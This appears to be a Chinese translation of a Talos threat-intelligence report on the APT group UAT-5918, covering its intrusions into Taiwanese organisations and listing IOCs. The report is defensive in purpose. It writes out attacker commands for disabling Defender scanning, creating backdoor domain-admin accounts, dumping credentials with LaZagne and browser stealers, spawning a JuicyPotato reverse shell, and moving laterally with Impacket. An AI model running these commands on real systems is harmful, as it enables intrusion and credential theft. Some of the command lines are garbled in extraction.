概述
Talos 高度确信 UAT-5918 是一个高级持续性威胁 (APT) 组织,其目标为台湾地区的实体,旨在在受感染环境中建立长期持续访问权限。UAT-5918 通常通过利用暴露在互联网上的未修补 Web 和应用服务器中的 N-day 漏洞来获取初始访问权限。随后,威胁行为者将使用大量开源工具进行网络侦察,以深入受感染的企业。
我们监控的活动表明,入侵后的活动是手动完成的,主要目的是窃取信息。显然,它还包括在任何发现的子域和可访问互联网的服务器上部署 Web Shell,从而为受害组织打开多个入口点。UAT-5918 的入侵会收集凭证,以获取本地和域级用户凭证,并创建新的管理用户帐户,以提供额外的访问渠道,例如通过 RDP 访问对威胁行为者至关重要的端点。
UAT-5918 使用的典型工具包括 FRPC、FScan、In-Swor、Earthworm 和 Neo-reGeorg 等网络工具。凭证收集是通过转储注册表配置单元、NTDS 以及使用 Mimikatz 和浏览器凭证提取器等工具来完成的。然后,这些凭证将被用于通过 RDP、WMIC(PowerShell 远程处理)或 Impacket 执行横向移动。
UAT-5918 活动集群重叠
UAT-5918 的工具和 TTP 与包括Volt Typhoon、Flax Typhoon和Dalbit在内的多个 APT 组织有很大重叠。
图 1. UAT-5918 TTP 和工具与类似的 APT 组重叠。
入侵后的工具和 TTP 与 Volt Typhoon 有很大的重叠,例如使用 ping 和 In-Swor 等工具进行网络发现;收集驱动器和分区等系统信息;收集名称、ID、大小和可用空间等逻辑驱动器信息;从 Web 浏览器应用程序中转储凭据;使用frp、Earthworm和Impacket等开源工具建立控制通道;并且没有定制恶意软件。美国政府评估Volt Typhoon是受中国政府支持的行为者,正在对美国关键基础设施进行网络攻击。
此次入侵中使用的多种工具与 Flax Typhoon 过去使用的工具重叠,例如 Chopper Web Shell、Mimikatz、JuicyPotato、Metasploit、WMIC 和 PowerShell,并采用了依赖RDP和其他 Web Shell 驻留在企业中以及使用 WMIC 收集系统信息等策略。美国政府将 Flax Typhoon归咎于一家受中国政府支持的威胁行为体,该公司是一家总部位于中国的公司Integrity Technology Group 。
此外,UAT-5918 使用的工具(例如 FRP、FScan、In-Swor 和 Neo-reGeorg)以及文件路径和名称与Tropic Trooper使用的重叠。Tropic Trooper 的恶意软件套件(特别是 Crowdoor Loader 和 SparrowDoor)与被称为Famous Sparrow和Earth Estries 的威胁行为者重叠。我们还观察到 UAT-5918 在此次活动中使用的工具和策略与 Earth Estries 开展的操作有重叠,包括使用 FRP、FScan、Webshell、Impacket、living-off-the-land 二进制文件 (LoLBins) 等。此外,我们在 UAT-5918 和 Dalbit 之间发现了类似的工具,包括端口扫描器、代理工具、反向 shell 和侦察 TTP。
值得注意的是,UAT-5918 使用的 LaZagne、SNetCracker、PortBrute、NetSpy 等工具子集并未在公开报告中被上述威胁行为者使用。这些工具很可能是 UAT-5918 独有的,或者其他相关组织对这些工具的使用可能在公开披露中被忽略。
受害者学和目标垂直行业
UAT-5918 在目标地区和行业垂直方面也与前面提到的 APT 组织有重叠,这表明该威胁行为者的行动与上述威胁行为者的战略目标一致。
我们观察到 UAT-5918 主要针对台湾地区的电信、医疗保健、信息技术和其他关键基础设施等垂直行业实体。Volt Typhoon、Flax Typhoon、Earth Estries、Tropic Trooper 和 Dalbit 等 APT 组织也曾针对类似的垂直行业和地区发动攻击。
初步进入和侦察
UAT-5918 通常通过利用暴露在互联网上的未打补丁服务器上的已知漏洞来获得对受害者的初始访问权限。成功入侵后的活动包括初步侦察,以识别用户、域并收集系统信息。在端点上执行的典型命令包括:
ping <IP>
net user
systeminfo
arp –a
route print
tasklist
tasklist -v
netstat -ano
whoami
ipconfig
query user
cmd /c dir c:\users<username>\Desktop
cmd /c dir c:\users<username>\Documents
cmd /c dir c:\users<username>\Downloads
初始凭证侦察是使用 cmdkey 命令进行的:
cmdkey /list
然后,威胁行为者继续下载并在终端上放置公开可用的红队工具(将在后续章节中说明),以执行进一步的操作。在某些情况下,UAT-5918 还会禁用 Microsoft Defender 对磁盘上工作目录的扫描:
powershell.exe -exec 绕过 Add-MpPreference -ExclusionPath <working_directory>
powershell Get-MpPreference
入侵后的工具
UAT-5918 的后期攻击工具由 Web Shell 组成,其中一些是公开可用的,例如 Chopper Web Shell、多个红队和网络扫描工具以及凭证收集器。
反向代理和隧道
攻击者使用 FRP 和 Neo-reGeorge 建立反向代理隧道,以便通过攻击者控制的远程主机访问受感染的终端。这些工具通常以存档形式下载,并在执行前提取:
用于建立代理的 Earthworm (ew) 工具也运行:
端口扫描
FScan 是一个端口和漏洞扫描工具,可以扫描攻击者指定的 IP 地址和端口范围:
Talos 特别观察到了针对这些端口的威胁行为:
21 22 80 81 83 91 135 443 445 888 808 889 5432 8000 8080 54577 11211
威胁行为者还广泛依赖 In-Swor(一款由中文人士编写并记录的公开工具)来跨 IP 地址范围进行端口扫描。In-Swor 的示例命令如下:
Run[.]exe -h <ip_range>/24 -nopoc -pwdf pw[.]txt -p 1521,6379 -t 4
In-Swor 用于扫描 IP 地址范围内的以下端口:
22 SSH 80 HTTP 135 RPC 445 SMB
1433 SQL 服务器
1521 Oracle 数据库
3306 MySQL 3389 RDP 4194 Kubernetes? 5432 PostgreSQL 5900 VNC 6379 Redis 10248 ? 10250 Kubernetes
10255 MongoDB
在其他情况下,In-Swor 用于建立代理通道:
svchost[.]exe proxy -l *:22 -k 9999
svchost[.]exe proxy -l *:443 -k 9999
svchost[.]exe proxy -hc -l *:443 -k 99997654
svchost[.]exe -hc proxy -l *:443 -k 99997654
svchost[.]exe proxy -l 443 –v
svchost[.]exe -type server -proto tcp -listen :443
svchost[.]exe -type server -proto http -listen :443
svchost[.]exe -type server -proto rhttp -listen :443
除了 FScan 之外,研究人员还下载并使用了PortBrute,这是另一个针对 FTP、SSH、SMB、MYSQL、MONGODB 等多种协议的密码暴力破解工具:
PortBruteWin(5).exe -up <用户名>:<密码>
额外的网络侦察
威胁行为者使用两个实用程序来监视与受感染主机的当前连接——NirSoft 的 CurrPorts 实用程序和 TCPView。这两种工具都可能用于执行额外的网络发现,以查找可访问的主机进行转移:
C:\Users<compromised_user>\Desktop\cports-x64/cports.exe
C:\Users<compromised_user>\Desktop\TCPView\tcpview64.exe
威胁行为者还使用基于 PowerShell 的脚本尝试通过 SMB 登录到他们已经识别的特定端点:
powershell[.]exe -file C:\ProgramData\smblogin-extra-mini.ps1
Netspy 是另一个由中文人士编写和记录的工具,它是一款网络分段发现工具,UAT-5918 偶尔会用它进行发现。操作员必须查看工具帮助这一事实表明该工具缺乏自动化,并且使用方式不寻常:
netspy[.]exe -h
收集本地系统信息
攻击者还可能收集命令来分析端点及其驱动器:
wmic diskdrive get partitions /value
fsutil fsinfo drives
wmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace
wmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace /format:value
保持对受害者的持续访问
威胁行为者试图在他们发现的托管 Web 应用程序的系统上部署多个 Web Shell。这些 Web Shell 通常是基于 ASP 或 PHP 的文件,并放置在诸如图像目录、用户文件等管理目录的深处。
威胁行为者使用 JuicyPotato(一种权限提升工具)的 Web Shell 变体,该变体允许 JuicyPotato 充当受感染系统上的 Web Shell,接受来自远程系统的命令来执行:
然后运行 JuicyPotato 来生成 cmd[.]exe 来运行反向 shell,允许威胁行为者运行任意命令:
Run.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
UAT-5918 还将使用 PuTTY 的 pscp 工具连接网络内可访问的端点(可能是服务器),并向其提供额外的 Web Shell:
pscp[.]exe <web_shell> <用户>@<IP>:/var/www/html/<web_shell>
此外,Talos 还观察到 UAT-5918 执行反向 Meterpreter shell 来维持对受感染主机的持续访问:
C:\ProgramData\bind.exe
C:\ProgramData\microbind.exe
C:\ProgramData\reverse.exe
cmd /c C:/ProgramData/microbind.exe
后门用户帐户创建
UAT-5918 定期创建并分配管理权限给他们在受感染端点上创建的用户帐户:
net user <受害者名称_用户名> <密码> /add
net localgroup administrators <用户名> /add
net group domain admins <用户名> /add /domain
凭证提取
凭证收集是 UAT-5918 入侵的一个关键策略,通过使用 Mimikatz、LaZagne 和浏览器凭证窃取程序等工具进行检测:
Mimikatz:运行常用的凭据提取工具,从端点获取凭据:
LaZagne:LaZagne 是一个开源凭证提取器:
C:/ProgramData/LaZagne.exe
C:/ProgramData/LaZagne.exe -all >> laz.txt
注册表转储:“reg”系统命令用于转储 SAM、SECURITY 和 SYSTEM 配置单元:
Google Chrome 信息:攻击者还使用名为 BrowserDataLite 的工具,该工具用于从 Web 浏览器提取登录信息、Cookie 和浏览历史记录。提取的信息随后可通过 notepad[.]exe 访问:
BrowserDataLite_x64.exe
C:\Windows\system32\NOTEPAD.EXE Chrome_LoginPass.txt
C:\Windows\system32\NOTEPAD.EXE Chrome_Cookies.txt
C:\Windows\system32\NOTEPAD.EXE Chrome_History.txt
SNETCracker:基于 .NET 的密码破解程序(暴力破解器),适用于 SSH、RDP、FTP、MySQL、SMPT、Telnet、VNC 等服务:
查找与凭证相关的字符串,例如:
findstr /s /i /n /d:C:\ 密码 *.conf
转向其他端点
UAT-5918 持续尝试访问企业内的其他端点。他们会周期性地执行网络侦察,以发现值得关注的新端点,并尝试通过 RDP 或 Impacket 获取访问权限:
mstsc.exe -v <主机名>
Impacket 还多次被用来转向其他端点并复制工具:
python wmiexec[.]py Administrator:<password>@<IP> -codec big5 1> [][]127[.]0[.]0[.]1\ADMIN$__<timestamp> 2>&1
cmd[.]exe /Q /c echo python wmiexec[.]py Administrator:<password>@<IP> -codec big5 ^> \<hostname>\C$__output 2^>^&1 > C:\Windows\jFcZpIUm[.]bat & C:\Windows\system32\cmd[.]exe /Q /c C:\Windows\jFcZpIUm[.]bat & del C:\Windows\jFcZpIUm[.]bat
cmd[.]exe /Q /c net use [][]<IP>\c$ /user:<username> 1> [][]127[.]0[.]0[.]1<share>__ 2>&1
cmd[.]exe /Q /c dir [][]<IP>\c$ 1> [][]127[.]0[.]0[.]1<share>__ 2>&1
cmd[.]exe /Q /c copy fscan64[.]exe [][]<IP>\c\ 1> [\][\]127[.]0[.]0[.]1\<share>__ 2>&1 cmd[.]exe /Q /c copy [\][\]<IP>\c
\ 1> [\][\]127[.]0[.]0[.]1\<share>__ 2>&1 cmd[.]exe /Q /c copy [\][\]<IP>\c
<scan_result>.txt 1> [][]127[.]0[.]0[.]1<share>__ 2>&1
cmd[.]exe /Q /c copy fscan[.]exe [][]<IP>\c\ 1> [\][\]127[.]0[.]0[.]1\<share>__ 2>&1 cmd[.]exe /Q /c copy mimikatz[.]exe [\][\]<IP>\c
\ 1> [\][\]127[.]0[.]0[.]1\<share>__ 2>&1 cmd[.]exe /Q /c copy mimikatz[.]exe [\][\]<IP>\c
1> [][]127[.]0[.]0[.]1<share>__ 2>&1
文件收集和暂存
UAT-5918 遍历了所有终端,枚举了本地和共享驱动器,以查找威胁行为者感兴趣的数据。这些数据可能涵盖所有有助于实现 APT 战略和战术目标的信息,涵盖机密文档、数据库导出和备份以及应用程序配置文件等。在一个实例中,威胁行为者使用 SQLCMD[.]exe 实用程序创建了一个可被窃取的数据库备份:
C:/ProgramData/SQLCMD.EXE -S <target_server_DB> -U <username> -P <password> -Q BACKUP DATABASE <NAME> to disk='<db_backup_location>.bak'
###ICOS
15a2e86d950ac4b11cc38c437f7d38b6be47f5e03ab9bdf05db344afddbc73ae
0321758329ca44f1c9f7e15a37f081df39ba37598b1547d2f2bbc839b34f0b2b
033de779278ecfdee7117d5d0a710e22eb501421e0c5f93e4ea3e82f414bbb90
048642a4773c5b3bb0b1cbc260a4f08c5db6c95a390971347ea5b055ed1b4dbe
0737b47a47defc6051cec713f53d8fd4d532ff0011fc94d6b01c5a525bfbae44
0c0d6e88326574a8b761f71c9e0bb186ce17bdd4fe1ac68d080113fa3f0a6fdd
0ca3239a90cc3421062090129932050f793e2fb81498711703a9d32967aba9ce
121746df4264aca0c138d35bbe5e2c6eaaa60b72967a527687e83d7e2c653207
134d02ddcc75a2d7e0e1824d430ba2e9a2a96682452fa6ec84660ed5d0a88023
15a5e11ea8f416f7d27d02ce876bfa8dcd22cdedb93764bffc8db4c5a922ae18
236850ae28015cf9b0f20a677ade5bef2a85bef665585c48d88cc00a823323ad
27e226d57abfb671b676eb82fe286db0964d35fff73c905573550052e0242176
28a5acd85516b62d870bd89df464360ecc705324c8e5266e81e7622b25c9d4ff
292fce69ac86ae1db56589d018bd390596847a9fe531797102a18c9ff7697d42
2bc8446ee880b1097e1220e1922251f209b5368e1388c135c032ba01f32b8b5a
330d36e248881a0a24a7d0612f3ac9a5a24cc960b36c2fe9ba0d63941b12fc18
393421a3673ef684fb916c4b61efdde54d76f14787b422e1a469e5e97b5c098a
4117245310c57f687d0c353c06a6eda4c1e93ebee33fb5f712142c272a3c1108
43a9f0a3963d700a6d586c65fc7fdd1bb562b861942c384e7767213cf1059ef9
48c9152e48c525960663f98579edaa35f94025015403bb382f32cb78d69fd850
502104d48d0a4735a6a051744277c9231f8da156311ec99367bca50b7a47a613
5300b4624e8e95c8dd86859f1f84c054c26a4869c4c3d714e9c6d7a01b2c11ae
58c651a2fa72cee6d867fc80790b9b26eca30b9cb0dbb129ac1b175b25d38c3a
5a26624600d7ef102375317a32db739531bfab91335131edd1e2362f2753e693
5b2ad349dd02a00bc8860294657139d681b0c786afcbcb1ffab77f57b01e7b00
5baa482ac4553b9939c49c16da6e0f4fda2cf9f2ae0248774214943c2d86389c
693874fcf694a9a9ad04fe75d96de7fe9ebe2e07ee1441c79ac3e8eb8aeb06b5
71b900826c223ca6c73882346375434b7f29f3955e3904bd240b88fc6ab6e802
7919c32cf82736197cf7ea99056560c18e28f8b726a6be8700625508524e5167
79af449339eb1410e8f3ed8d7fe7649b079e0143a06ef91cc78f296b0e927901
7c50be91304ee573c2bc8823f67ea4f45a1988ceb73ffe5ebcaccaf59e5c1cce
7df17642229f1776a5fb8e64365d95ce345484cbadec23332a3c00657c2f360f
7ea77f4746f21e89df52c9a54c12135f3f45f7a342e8b1dba09abf2a7e8c4f15
802f56cc84689a68112a2cf76ddce70e1e3956038e19bb8c58f74d5713d72a5f
8087db3c43840caccb9756893cdaff707311dc195f34de471cc259b1b62e3411
83024c7a9ba256a36fb9b751926170c08dd4daa1866c119856cd091b1275897f
83dab2e356e1069fe48bfba91e1c2cc73ce2738e2870813f9997cee984be583f
86a22e164f96a2d194095419c746cdf12737b78af629d251e0c881f381932a48
8800edc6961be56a9d44f843d224f19b47834bd57037cff2041b7c563d3d2422
899a46e956e82b9da2b86eae8cbdec1e68521c708a87bce1a2ae11b20538eb55
9139646892f67f12dd2a9d2b43a7ae28f1556f5e42332effcf6ea17a63794a44
949ef0168d19d61cc39a369d18f5c2949686801bbea6f7136f66cfe92fe85907
94ca1389a8af382e347772bb4d977aa7516ea742c99306b78c486f5104b34a1b
953b5b7878bb2c4f40f2b131a01399c1b170731206bc09cb5a133ab996ec691c
995f76b1f695f92179f2ec93fd1f67d5a58753bc6d0ff00a46653d634e3000fe
9b01625fb72ba8c3c840ab46d1eaebcff87a0f109f36c6744ba191ee82784981
a3e5337650a53d3d6cbe13b1cd32e493f0292dec9d9483de8f8322fe634f63c5
a73226550f0b97c3f25411ba62181aa011e8410dec4a1444412f40114704d4c2
a98810a2ba2427067d2412bf67f47f93e22989607d69fc17ff9ac6fc774674cc
ab1fc7f73bf3867dfc471f9aeb815af0d83e4e2c5eeb85365a266daf53af39cb
acb3954b95e3c897d5ac69a8cc09ed81aace7b3193aa637f5ceb2a4a23204078
b34cc0a4ee0bfff6d788387730a748ad9055456a648d072d436e44ef7050babc
bf7bed4724ec1cf1dda5ac1a1ace33eaa52394c0ee9976ade1bbef17d4b1a717
c160899ba65ab2c3651dcb98fa13dddea892f72c0aaa1ff63cb98aac67367c56
c4d4213ff3b737fe20248362687a0cd3008b630a65b230b06fba282379665c83
c64554c29d798e6006aa5845da7252f18c01e305f61071e314a23ab143ed73f8
c85f1325590ee8600759334d3a2c807eae599eff4a4255dab0f59c31667e6bdd
c8a636d150a0045eb799ccc7c5e2fa46156f3f72167b9e49456a358e484eac8b
c91841bd675c5a02d577567baa3a71be3cd37fdb59412f133a3773de6ee10602
cb6458227f8b4b3edbac12bef66edd5b0d8d3712637a6c77db67040360897023
cd229d29ef929feb9a74a6b265fd26caa3fd5be2d2150ba359336307799872be
cdd21e4f9ff1d1cfcf4888342fa2be5452eb3cbe7ba28e4e98fa44c879fe0265
d00418cd52123f9f6a9bd0edafc77d7fa39f68de6be84ec07ed67a735872f939
d0e8a91af95d62dc58dbfd64970f1b255c6bffedeaf21b3e6ec4e89496f6c67a
d4fbc5702731a01d96cbaa21bd60333f1d03a994adb5b931687281282c938f12
d73bac6e8a5679394152bb33e64fbe5840ff13953b9ca024003a5045dce715ae
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7
dc02cfebbc64d6dbcc3a1b1a2cc91cb763c0be9a72ac141c2f06db74aa56cfe7
dc92d2870219833832ea758afcb19c285f65bf3a6a3ace225b499f744d6063a4
e66e9df50f40aa73dc847f6afdf9852000782841df6b808a75e090e9787604dd
e6df89bb9d51817fff1b7704e70d406584d80839e1bb1cb319c4150015b84914
eb8da26034035f08946acb6fc127e3b2db884a024a61aea99397c46aedc70145
ecb3d3466686f3201719528b067e306d58f1c61228e1d6e8c7c510cc1536ebd9
ecf7e135bcdcad3274e94c6ab918b683da619e91a9e0c68bd8d6355b33bfc5da
ef0b2e0c337e11a94279025f9cdeba519d1aee7c1af3013053fe510955e2aa85
f028c4086990756ee37dee303015053c73ec1c4d358e3a6a50b3e88a6c7ffe8e
f06702618720df5bd9b12ee68fa6b498cacea0ce162cd92267748a6dede6f789
f76dfaab6e248d88241a17b5a58fd2405d0d1954364bce9144156eba3904dd6a
fbd030b53088a536d7e6b6a80e4767c097fbfcb11a921dd7c0fa938322f96842
ff26b2cc11696d5931757cc6bdafb1163f48b7f41f17d1e593ea3ee9f5176e2e
146.185.233.101
146.185.233.79
146.185.233.90
146.185.233.96
146.185.233.97
146.185.233.98
146.185.233.99
146.185.239.33
146.185.239.45
146.185.239.47
146.185.239.51
146.185.239.56
146.185.239.60
80.66.79.155
80.66.79.159
80.66.79.195
80.66.79.200
80.66.79.91
81.19.131.95
